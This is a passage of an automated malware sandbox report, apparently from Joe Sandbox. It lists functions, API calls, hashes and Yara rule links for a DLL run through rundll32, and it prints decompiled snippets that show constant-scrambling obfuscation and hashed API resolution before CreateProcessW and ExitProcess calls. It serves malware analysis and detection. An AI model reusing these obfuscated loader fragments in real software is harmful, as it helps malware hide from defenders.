String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 9d24e7ae8c7877433bce1b1b84685e4bfa200b26273c3cfd6f43e1ed0be840b0
Instruction ID: 82cdbb4cfb35b7b8362a1bffabd1cc009c95c07c9995f05009c24960642ac965
Opcode Fuzzy Hash: 9d24e7ae8c7877433bce1b1b84685e4bfa200b26273c3cfd6f43e1ed0be840b0
Instruction Fuzzy Hash: E811BE71804B449FD720CF68C944B4BBBF8FB29654F008A1EE469D3A81D779A118CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AA5BB, Relevance: 6.3, APIs: 4, Instructions: 316COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6F1AA642

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: cae96cd944f24bfe251b0d126a4b103d3cc5a52edf7e0cf0203c8768d0cc22b6
Instruction ID: 8d79d5beb973964109bbda699abdf45ce6201e48ac14382c95b86a4ced958362
Opcode Fuzzy Hash: cae96cd944f24bfe251b0d126a4b103d3cc5a52edf7e0cf0203c8768d0cc22b6
Instruction Fuzzy Hash: 60B16976D45346DFE712CF68C8507AEBBB0EF217D4F1542AAD5409B281C33AAD62CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6F185A30, Relevance: 6.1, APIs: 4, Instructions: 134clipboardwindowCOMMON

Download Yara Rule

APIs

GetOpenClipboardWindow.USER32(00000000,?,00000000,6F186431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6F185A3C
CloseClipboard.USER32 ref: 6F185A73
GetMenuCheckMarkDimensions.USER32 ref: 6F185B30
IsSystemResumeAutomatic.KERNEL32 ref: 6F185BA0

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$AutomaticCheckCloseDimensionsMarkMenuOpenResumeSystemWindow
String ID:
API String ID: 2155751611-0
Opcode ID: 0cae6e901b9fa6913f2e114bcbd786c37c5c959a59ed5aa3c53d15199e59f442
Instruction ID: 37d6de6336f669d83525c1c5408243f48ee66e2f9c533366cc6348ea31f7e111
Opcode Fuzzy Hash: 0cae6e901b9fa6913f2e114bcbd786c37c5c959a59ed5aa3c53d15199e59f442
Instruction Fuzzy Hash: EE41DC31914B418AC302CE3986D011BFBF6FFF66E4F54975EF452A6151FB30A8A58A82

Uniqueness

Uniqueness Score: -1.00%

Function 6F188FB0, Relevance: 6.1, APIs: 4, Instructions: 121COMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32(?), ref: 6F188FE1

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: String
String ID:
API String ID: 2568140703-0
Opcode ID: 05a7ec267e4b3df888bd576579bf89e21d90ed884ce03a98ada8606ca36bc8eb
Instruction ID: 3beced3632229978a659670ebd5e2279cea2d22935a183380a025e643c894b7f
Opcode Fuzzy Hash: 05a7ec267e4b3df888bd576579bf89e21d90ed884ce03a98ada8606ca36bc8eb
Instruction Fuzzy Hash: F531FB32B082159B9F08CD6DE59556EB7E5EF547F0710826FEC25CB244EB32E960CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AF32A, Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(24448D6F,00000000,?,00000002,00000000,00000000,00000000,00000000,?,24448D6F,00000001,00000002,?,00000001,00000000,?), ref: 6F1AF377
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6F1AF400
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6F1AF412
__freea.LIBCMT ref: 6F1AF41B

Part of subcall function 6F1A9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F198F9C,00000105,000000FF,24448D6F,00000000,?,6F181687,?,00000103,000000FF), ref: 6F1A9C04

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: cdc2fe81e0eca24fb9db515defc375f37fbbe9c9c0eb437245faf9336a6df7f4
Instruction ID: c908ef7bf4a5ce8eb14fb09d3dcee8aef30c9184ef20325aefc3ce2f6d910261
Opcode Fuzzy Hash: cdc2fe81e0eca24fb9db515defc375f37fbbe9c9c0eb437245faf9336a6df7f4
Instruction Fuzzy Hash: F531C176A1071AAFDF148F64CC84DEE3BA5EF50790F054269EC24DB180E736E965CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F188E70, Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 6F188ECE
SysAllocString.OLEAUT32(?), ref: 6F188F39
_com_issue_error.COMSUPP ref: 6F188F75
_com_issue_error.COMSUPP ref: 6F188F7F

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: da23d15d7b612ce8bf7aa01639b2b891c875ec31f075a4f20421045accb1b029
Instruction ID: c6c02b2c63ddaf44f8edcd0de7859f50aade3ad305947cf03a16cfb97c6cfdc6
Opcode Fuzzy Hash: da23d15d7b612ce8bf7aa01639b2b891c875ec31f075a4f20421045accb1b029
Instruction Fuzzy Hash: 8231B671A04755DBE7209F69CA84B46B7E8EF21BB4F20466AE834E7680D774F4608B90

Uniqueness

Uniqueness Score: -1.00%

Function 6F188D60, Relevance: 6.1, APIs: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 6F188DC0
_com_issue_error.COMSUPP ref: 6F188DFC
_com_issue_error.COMSUPP ref: 6F188E06
SysFreeString.OLEAUT32(-00000001), ref: 6F188E34

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: String_com_issue_error$AllocFree
String ID:
API String ID: 3737277060-0
Opcode ID: 832641063cfac77c9d3911fce65b6d8920d3bd0e06461c3889ba046111810d3f
Instruction ID: c0b5ba9f7b4543eecabffcddc9526467730fc7829d5ec156878aba72206d73b3
Opcode Fuzzy Hash: 832641063cfac77c9d3911fce65b6d8920d3bd0e06461c3889ba046111810d3f
Instruction Fuzzy Hash: 9D31A271905B15DBD7208F59D904B97BBE8EF11BB4F10462AE8359B280E7B5A460CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1932C0, Relevance: 6.1, APIs: 4, Instructions: 75threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6F1CFAA4), ref: 6F1932CC
GetCurrentThreadId.KERNEL32 ref: 6F1932DC
LeaveCriticalSection.KERNEL32(6F1CFAA4), ref: 6F19330C
SetWindowLongW.USER32(?,000000FC,00000000), ref: 6F19335F

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CurrentEnterLeaveLongThreadWindow
String ID:
API String ID: 3550545212-0
Opcode ID: 78db119625ea3467043fb9ec89430c19cf626bcfae1fbcb736f36d3460eb9669
Instruction ID: ce4db208d31a5609d55105accb9d37ad79fa174aca4c0f4b96360359eeab6e78
Opcode Fuzzy Hash: 78db119625ea3467043fb9ec89430c19cf626bcfae1fbcb736f36d3460eb9669
Instruction Fuzzy Hash: 5121A132A44615AF87108F66D84581BBB79FF857F0705452EE81DDB640DB31E931CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6F1890C0, Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 6F1890C7
VariantCopy.OLEAUT32(?,?), ref: 6F1890D1
_com_issue_error.COMSUPP ref: 6F1890E3
VariantClear.OLEAUT32 ref: 6F1890F1

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearCopyInit_com_issue_error
String ID:
API String ID: 309108855-0
Opcode ID: d66769b9df105c0e9cf418a0bcc05894068433f09788baf223a6c40ba0da61ad
Instruction ID: a029b398794ed0557ca1e777639442f94b77db5b5d2529de9847d1ab9de14fd8
Opcode Fuzzy Hash: d66769b9df105c0e9cf418a0bcc05894068433f09788baf223a6c40ba0da61ad
Instruction Fuzzy Hash: B9D05E32600628AB9E146BA5AC0CCCF7A1CEF167F97404036F610C2900CBB6D520CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 6F1A7468, Relevance: 6.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 6F1A74CC: _free.LIBCMT ref: 6F1A74EC

_free.LIBCMT ref: 6F1A7482

Part of subcall function 6F1A9B98: HeapFree.KERNEL32(00000000,00000000,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BAE
Part of subcall function 6F1A9B98: GetLastError.KERNEL32(6F1A6995,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BC0

_free.LIBCMT ref: 6F1A7495
_free.LIBCMT ref: 6F1A74A6
_free.LIBCMT ref: 6F1A74B7

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7df798bac5073ceb106aeb7c125623ca7ab6b3b319867d773c3ec74fe60c34d8
Instruction ID: 09cc3303a3f37f4daaae79b0f582466f3faf4607e378373f51f24bd6ba03bec7
Opcode Fuzzy Hash: 7df798bac5073ceb106aeb7c125623ca7ab6b3b319867d773c3ec74fe60c34d8
Instruction Fuzzy Hash: 35F03976822B58AABF016F24D800CDA3B79EB166F6350010AE408BA252DB3325B5CA81

Uniqueness

Uniqueness Score: -1.00%

Function 6F18BC70, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 204COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,1E3BCBB0,00000000,?), ref: 6F18BCDE

Strings

\PerfmonBar\config.xml, xrefs: 6F18BD92

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderPath
String ID: \PerfmonBar\config.xml
API String ID: 1514166925-3729978544
Opcode ID: 5e13d745d50260cea41bf330b3d80d451177f2dd13bc90483bdaa19a6570d598
Instruction ID: 2fc2ef4bfb770a3a189d17ec1ae1a2f92b12d74e2abda0ba6ca05e8a94fa19a5
Opcode Fuzzy Hash: 5e13d745d50260cea41bf330b3d80d451177f2dd13bc90483bdaa19a6570d598
Instruction Fuzzy Hash: 0871A571D10658EFDB20CF64CD84B9EB7B4FB08754F104299E929A7280EB74BA54CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B560B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,6F1B5866,?,00000050,?,?,?,?,?), ref: 6F1B56E6

Strings

OCP, xrefs: 6F1B565F
ACP, xrefs: 6F1B5629

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 633e0caaa117a8eb1659b2d7c8f59ec54760dc5250f1d4193a442189a7f0f802
Instruction ID: 1d5421310269eaf9edd329757c36324d2a7d72f910d7a2982c7b154b4dbcc8e6
Opcode Fuzzy Hash: 633e0caaa117a8eb1659b2d7c8f59ec54760dc5250f1d4193a442189a7f0f802
Instruction Fuzzy Hash: DB21F5A2A45104E6E7148B6CC901BC773AAAF64BE4F53852DE915DB24CF732FE20C390

Uniqueness

Uniqueness Score: -1.00%

Function 6F197FF4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,6F197876,00000001,00000004,6F18224A,00000000,?,6F181D57,6F1D14C0,6F185700,6F1D14C4,?,6F18224A,00000004,00000001), ref: 6F198078

Strings

ios_base::failbit set, xrefs: 6F197FF7

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast
String ID: ios_base::failbit set
API String ID: 1452528299-3924258884
Opcode ID: 2f8ceb5e3090cc8747f724e9ecde2f4263b8e6723f1f81d260a910e8cc31b90a
Instruction ID: fe3baef98a07dcaacb4e7476cf8e67c4b3c866fb042c242c64b3f769c1e6c998
Opcode Fuzzy Hash: 2f8ceb5e3090cc8747f724e9ecde2f4263b8e6723f1f81d260a910e8cc31b90a
Instruction Fuzzy Hash: 86118232248119EFDF029F65CC8459EBB65BF097F4B454039F9159A290DB72A8708BE0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1981F2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 6F188BC0: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,6F1CD6E8), ref: 6F188BC5
Part of subcall function 6F188BC0: GetLastError.KERNEL32(?,00000000,00000000,?,6F1CD6E8), ref: 6F188BCF

IsDebuggerPresent.KERNEL32(?,?,?,6F1811DF), ref: 6F198225
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6F1811DF), ref: 6F198234

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6F19822F

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: 01faa5f2a04d47b19fb862c5f733924de8538c646a1b3ee2e9db1bb21bab4fa8
Instruction ID: 05b40b09b98339a47d668d81f5e8043e99d272b21f048c762b9bd107277bc2f6
Opcode Fuzzy Hash: 01faa5f2a04d47b19fb862c5f733924de8538c646a1b3ee2e9db1bb21bab4fa8
Instruction Fuzzy Hash: ABE06D70508B00CBD360CF78D1487427BF4AF157E8F00886DE496D2640DB71E068CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AEAB3, Relevance: 5.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,032A6338), ref: 6F1AEB49
GetLastError.KERNEL32 ref: 6F1AEB57
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 6F1AEBB2

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 1c9e8fe0849df92831957cebb4c8d5fd6a3920610bbe09425649335e3db0bccc
Instruction ID: 9901c6afdec38299a561a71be617183b1b56c959f259c4e45e74e46b380723ca
Opcode Fuzzy Hash: 1c9e8fe0849df92831957cebb4c8d5fd6a3920610bbe09425649335e3db0bccc
Instruction Fuzzy Hash: BA412C38604705EFDB118F6AC884BAA7BB4EF123A0F114159E8699B1D0D733AB61C760

Uniqueness

Uniqueness Score: -1.00%

Function 6F198508, Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000008,00000000,6F193342), ref: 6F19850D
HeapAlloc.KERNEL32(00000000), ref: 6F198514
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F19855A
HeapFree.KERNEL32(00000000), ref: 6F198561

Part of subcall function 6F1983A7: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6F198550,00000000), ref: 6F1983CB
Part of subcall function 6F1983A7: HeapAlloc.KERNEL32(00000000), ref: 6F1983D2

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Alloc$Free
String ID:
API String ID: 1864747095-0
Opcode ID: fecea3762a5e6f73e86a9479c818c4e02b236055f172420ff76ededdd91b5f12
Instruction ID: 4e5fa270027287cc157c2a9359f2bfc2a91dea64206b51c79973969e82d40bb5
Opcode Fuzzy Hash: fecea3762a5e6f73e86a9479c818c4e02b236055f172420ff76ededdd91b5f12
Instruction Fuzzy Hash: 57F0B47264CE129BDB146BBCBC4C95B3A69AF827F5701412DF545C6544DF34D4218BD0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6876 Parent PID: 6668 rundll32.exeCOMMON

Executed Functions

Function 033331D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E033331D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E03332523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E03312309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

0x033331da
0x033331df
0x033331e1
0x033331e4
0x033331e7
0x033331e8
0x033331e9
0x033331ec
0x033331ef
0x033331f2
0x033331f3
0x033331f4
0x033331f7
0x033331fa
0x033331fd
0x033331fe
0x03333200
0x03333205
0x0333320f
0x03333214
0x0333321b
0x0333321f
0x03333223
0x0333322a
0x03333231
0x03333235
0x03333241
0x03333249
0x0333324c
0x03333253
0x0333325a
0x0333325e
0x03333265
0x0333326c
0x03333273
0x0333327a
0x03333281
0x033332a1
0x033332bb
0x033332c2

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 033332BB

Memory Dump Source

Source File: 00000005.00000002.459062334.0000000003310000.00000040.00000001.sdmp, Offset: 03310000, based on PE: true

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: e9186b950c034d9a9d69ae1f57158f1f1a53b62e8898887c3d3583ad350772aa
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 35311676801248BBCF65DF96CD49CDFBFB5FB99704F108188F914A6220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03314248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03314248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E03312309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

0x0331424e
0x03314254
0x0331425b
0x03314262
0x03314269
0x03314272
0x03314277
0x0331427c
0x03314283
0x0331428a
0x03314291
0x03314298
0x033142a2
0x033142aa
0x033142ad
0x033142b1
0x033142b5
0x033142bc
0x033142c3
0x033142c7
0x033142e7
0x033142f1

APIs

ExitProcess.KERNEL32(00000000), ref: 033142F1

Memory Dump Source

Source File: 00000005.00000002.459062334.0000000003310000.00000040.00000001.sdmp, Offset: 03310000, based on PE: true

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: ec436babe059077797cb368db0545719e1e4f5a39d52854ac172e5e5cd9e235c
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: 5A1128B5E00208EBDB48DFE5D94AADEBBF1FB44308F208489E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 033217CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E033217CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E03332523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E03312309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

0x033217d2
0x033217d5
0x033217d7
0x033217db
0x033217dc
0x033217e1
0x033217e8
0x033217f1
0x033217f8
0x033217ff
0x03321803
0x03321807
0x0332180e
0x0332181b
0x03321822
0x03321825
0x0332182c
0x03321833
0x03321844
0x03321847
0x03321859
0x0332185c
0x03321863
0x0332186a
0x0332186e
0x03321881
0x0332188d
0x03321893

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 0332188D

Memory Dump Source

Source File: 00000005.00000002.459062334.0000000003310000.00000040.00000001.sdmp, Offset: 03310000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: abe1a2cd40e214f1a67336e9766ee6f8786e53528e4e5bbe04cf9c25a77d8288
